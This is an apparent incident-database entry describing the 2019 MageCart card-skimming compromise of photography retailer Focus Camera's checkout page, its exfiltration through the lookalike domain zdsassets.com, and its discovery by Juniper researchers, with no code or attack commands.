Cyber Incident Victim: Focus Camera
Date:
Nov 2019
Location:
United States of America
Summary
A photography retailer's website was compromised by MageCart attackers who injected malicious code into the checkout process to steal customer payment information. The skimming script captured billing details including names, addresses, phone numbers, email addresses, and full credit card data during guest transactions. Attackers used a domain impersonating ZenDesk's legitimate services to exfiltrate stolen data. Security researchers discovered the breach after analyzing the obfuscated JavaScript payload and observed substantial traffic to the attacker-controlled server. Following notification delays due to timezone differences, the retailer removed the malicious code shortly after being alerted to the compromise.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 2 techniques |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
In late 2019, MageCart attackers compromised the website of photography retailer Focus Camera by injecting malicious JavaScript code designed to steal customer payment card information during the checkout process. The attackers registered the domain "zdsassets.com" on November 11, 2019, deliberately mimicking the legitimate ZenDesk domain "zdassets.com" to evade detection. Hosted on a Netherlands-based server, this domain served as the command-and-control infrastructure for exfiltrating stolen data. The skimming script activated when customers made purchases as guests without creating accounts, capturing billing details including names, email addresses, physical addresses (both billing and shipping), phone numbers, and full payment card information (card numbers, expiration dates, and CVV codes). The malicious payload was obfuscated using base64 encoding and injected into a legitimate JavaScript file on Focus Camera's website, operating in typical MageCart fashion by intercepting form submissions.
Juniper Threat Labs researcher Mounir Hahad discovered the skimming script in late December 2019 during routine analysis, decoding the base64-encoded routine to reveal its data theft functionality. DNS telemetry indicated the attacker-controlled domain had been resolved 905 times since its creation, suggesting potential victim volume though Hahad noted uncertainty about whether the infrastructure served multiple campaigns. After confirming the compromise, Juniper attempted to notify Focus Camera but faced delays due to time zone differences and weekend schedules. Upon establishing contact several days later, researchers shared their findings with the retailer's domain administrators, who removed the malicious code by the end of that same day. The incident exposed sensitive customer financial data through direct interception during transactions, though the article provides no specifics regarding subsequent customer notifications or forensic investigations into the initial breach vector.